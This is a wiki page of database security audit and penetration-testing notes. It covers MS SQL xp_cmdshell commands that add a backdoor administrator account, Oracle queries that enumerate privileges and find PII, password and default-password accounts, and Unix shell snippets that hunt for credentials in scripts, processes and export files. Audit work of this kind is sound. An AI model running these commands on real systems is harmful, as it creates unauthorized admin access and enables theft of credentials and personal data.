database_stuff

MS SQL Server

exec xp_cmdshell 'dir c:\'
exec xp_cmdshell 'net user borat Password123 /add'
exec xp_cmdshell 'net localgroup administrators borat /add'

Oracle

If we have an Open account what could we check for?

Privileges and learn about that account.

Object Privileges Views

select * from ALL_TAB_PRIVS;
select * from ROLE_TAB_PRIVS;

select * from ALL_SYS_PRIVS;
select * from ROLE_SYS_PRIVS;

select * from ALL_USERS;

    List all object privileges
    SELECT GRANTEE, 
        OWNER, 
        GRANTOR, 
        PRIVILEGE, 
        GRANTABLE
    FROM DBA_TAB_PRIVS 
    ORDER BY GRANTEE

List all system privilege grants made to roles and users

SELECT * FROM DBA_SYS_PRIVS;

List of all object privileges

SELECT TABLE_NAME, PRIVILEGE, GRANTABLE 
        FROM DBA_TAB_PRIVS

List all the column-specific privileges

SELECT GRANTEE, 
    TABLE_NAME, 
    COLUMN_NAME, 
    PRIVILEGE
FROM DBA_COL_PRIVS;

List all roles granted to other roles

SELECT * FROM ROLE_ROLE_PRIVS;

List all system privileges granted to roles

SELECT * FROM ROLE_SYS_PRIVS;

List all table privileges granted to roles

SELECT * FROM ROLE_TAB_PRIVS;

Check to see if PII data columns are visible

— All the following are PII element.

— ssn
— bank account number
— first
— last
— full name
— address
— dob
— mother's maiden
— medical
— finger prints
— photo
— passport data
— disiplinary data
— driver'sl no
— email
— telephone

select     object_name object, 
    object_type type, 
    owner owner
from     dba_objects
where owner<>'SYS'
and ((upper(object_name) like '%USER%'
and upper(object_name) not like 'USER_%')  
or upper(object_name) like '%USR%'
or upper(object_name) like '%PASSWD%'
or upper(object_name) like '%PWD%'
or upper(object_name) like '%PASS%'
or upper(object_name) like '%SSN%'
or upper(object_name) like '%SOCIAL%'
or upper(object_name) like '%TAX%'
or upper(object_name) like '%ACCOUNT%'
or upper(object_name) like '%ACCOUNT%NUM%'
or upper(object_name) like '%FIRST%'
or upper(object_name) like '%LAST%'
or upper(object_name) like '%NAME%'
or upper(object_name) like '%ADDRESS%'
or upper(object_name) like '%ADD%'
or upper(object_name) like '%DOB%'
or upper(object_name) like '%BIRTH%'
or upper(object_name) like '%MOTHER%'
or upper(object_name) like '%MAIDEN%'
or upper(object_name) like '%MEDICAL%'
or upper(object_name) like '%FINGER%'
or upper(object_name) like '%PHOTO%'
or upper(object_name) like '%PASSPORT%'
or upper(object_name) like '%DRIVER%'
or upper(object_name) like '%DRVR%'
or upper(object_name) like '%MAIL%'
or upper(object_name) like '%TEL%'
or upper(object_name) like '%TELEPHONE%'
or upper(object_name) like '%PASS%'
)
and object_type in('VIEW','TABLE')
union
select     table_name object,
     column_name type,
     owner owner
from     dba_tab_columns
where owner<>'SYS'
and (upper(column_name) like '%USER%'
or upper(column_name) like '%USR%'
or upper(column_name) like '%PASSWD%'
or upper(column_name) like '%PWD%'
or upper(column_name) like '%PASS%'
or upper(column_name) like '%SSN%'
or upper(column_name) like '%SOCIAL%'
or upper(column_name) like '%TAX%'
or upper(column_name) like '%ACCOUNT%'
or upper(column_name) like '%ACCOUNT%NUM%'
or upper(column_name) like '%FIRST%'
or upper(column_name) like '%LAST%'
or upper(column_name) like '%NAME%'
or upper(column_name) like '%ADDRESS%'
or upper(column_name) like '%ADD%'
or upper(column_name) like '%DOB%'
or upper(column_name) like '%BIRTH%'
or upper(column_name) like '%MOTHER%'
or upper(column_name) like '%MAIDEN%'
or upper(column_name) like '%MEDICAL%'
or upper(column_name) like '%FINGER%'
or upper(column_name) like '%PHOTO%'
or upper(column_name) like '%PASSPORT%'
or upper(column_name) like '%DRIVER%'
or upper(column_name) like '%DRVR%'
or upper(column_name) like '%MAIL%'
or upper(column_name) like '%TEL%'
or upper(column_name) like '%TELEPHONE%'
)
/

Check to see if the account could INSERT or UPDATE data to other schema objects

select * 
from all_tab_privs
order by grantor

Using our Scan account, what can we check for?

Select from the DBA_USERS_WITH_DEFPWD data dictionary view
SELECT * FROM DBA_USERS_WITH_DEFPWD;

The DBA_USERS_WITH_DEFPWD lists the accounts that still have user default passwords.

Find all users and their associated information as defined in the database

SELECT USERNAME, PROFILE, ACCOUNT_STATUS 
        FROM DBA_USERS;

Privileges and learn about all the account.
List all object privileges

SELECT GRANTEE, 
        OWNER, 
        GRANTOR, 
        PRIVILEGE, 
        GRANTABLE
    FROM DBA_TAB_PRIVS 
    ORDER BY GRANTEE

List all system privilege grants made to roles and users

SELECT * FROM DBA_SYS_PRIVS;

List of all object privileges

SELECT TABLE_NAME, PRIVILEGE, GRANTABLE 
        FROM DBA_TAB_PRIVS

List all the column-specific privileges

SELECT GRANTEE, 
    TABLE_NAME, 
    COLUMN_NAME, 
    PRIVILEGE
FROM DBA_COL_PRIVS;

List all roles granted to other roles

SELECT * FROM ROLE_ROLE_PRIVS;

List all system privileges granted to roles

SELECT * FROM ROLE_SYS_PRIVS;

List all table privileges granted to roles

SELECT * FROM ROLE_TAB_PRIVS;

Check to see if any of the use simple password cracker SQL to get all the User access

Check for the Version and Patch levels

Check to see the Parameters set for the ORACLE implementation

If we have the SYS or SYSTEM or DBA level access, what should we check for?

DBA_TS_QUOTAS view to list all tablespace quotas specifically assigned to each user.

SELECT * FROM DBA_TS_QUOTAS;

DBA_PROFILE view lists all profiles in the database and associated settings for each limit in each profile.

SELECT * FROM DBA_PROFILES
        ORDER BY PROFILE;

Find the memory use for each user session, query the V$SESSION view.

SELECT USERNAME, VALUE || 'bytes' "Current UGA memory"
FROM V$SESSION sess, V$SESSTAT stat, V$STATNAME name
WHERE sess.SID = stat.SID
AND stat.STATISTIC# = name.STATISTIC#
AND name.NAME = 'session uga memory';

Username Password is entered into the database link. (10g or earlier)

SELECT DB_LINK, OWNER_ID FROM V$DBLINK;

If we get access to the UNIX server having Oracle installed?

Check to see the $ORACLE_HOME access and privileges

Check umask for oracle account
Make sure that files created by the ORACLE acount will have secure permissions by default. (umask 022)

Check to see oracle account is not part of root group

i. cat /etc/group

Check to see any other OS account does not have dba group
ii. cat /etc/group

Check to see the .dbf file permissions. Should be 600 for oracle is to run the database

Check to see any other OS account does not have dba group

iii. cat /etc/group

Oracle raw devices should have minimum permissions so only Oracle can use them.
iv. ls -al device/disk/volume

Usernames/ passwords in process list.

v. ps -aef

Usernames/ passwords in scripts.

#!/bin/bash/
find $ORACLE_HOME -name "*" -print | while read filename
do 
  echo "filename "$filename >>user.lis
  egrep -I 'connect|sqlplus' $filename >> user.lis2>/dev/null

Usernames/ passwords in Environment variables.

Control files .ctl should have read and write only by Oracle.

Check if export files are accessible on the system. (This file will have USER$ and can be extracted.

find $ORACLE_HOME -name "*" -print | while read filename do egrep -I 'EXPORT' $filename >>exp.lis 2> /dev/null   done
Unless otherwise stated, the content of this page is licensed under Creative Commons Attribution-Share Alike 2.5 License.